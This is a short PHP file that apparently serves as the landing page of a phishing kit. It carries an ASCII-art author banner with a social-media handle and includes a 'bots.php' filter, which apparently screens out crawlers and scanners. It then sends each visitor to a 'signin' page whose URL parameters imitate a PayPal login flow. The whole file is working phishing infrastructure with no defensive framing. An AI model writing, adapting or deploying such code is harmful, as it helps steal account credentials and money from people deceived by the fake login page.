<?php
/*
<!--                
  __________      __    __        __        __   ______________                   ____________
 |###########\   |##|  |##|       \#\      /#/  |#############/                  /############|
 |############|  |##|  |##|       \#\      /#/             /#/                  /#############|
 |############|  |##|  |##|        \#\     /#/            /#/                  /   ___________|
 |############|  |##|  |##|         \#\   /#/      ______/#/___       _        |###|   _______
 ____________/   |##|  |##|          \#\ /#/      /#/#/#/#/#/#/       \#\      |###|   |######|
 |###########\   |##|  |##|           |###|           /#/            /------\  |###|   |#|   ||
 |############|  |##|  |##|            |#|           /#/            / #######| |###|   |#|   ||
 |############|  |##|  |##|            |#|          /#/             | _______| |###|_________||
 |############|  |##|  |##|__________  |#|         /#/___________   |          |##############/
 _____________/  |##|  |############/  |#|       /#/#############|   \_______|  \############/
 -->


<!-- 

FB.COM/Billy.ZeG.Dz
*/

if (!isset($_SESSION)) {
  session_start();
}

include "./bots.php";

$src="signin/?cmd=_flow&SESSION=TR0ARZo5EF6yOEy0k8vdxlIhqVldR6Mq873DB5vxN8gf3Xxa7qINDvBrvjW&dispatch=50acfdd2fbb19a3d47242b071efa252ac2167fda149e5590dd8ac4b4caff7d0702d631b2c70bbe41527861c2b97c3d1f6a8e47ebd1fddf03";
header("location:$src");
?>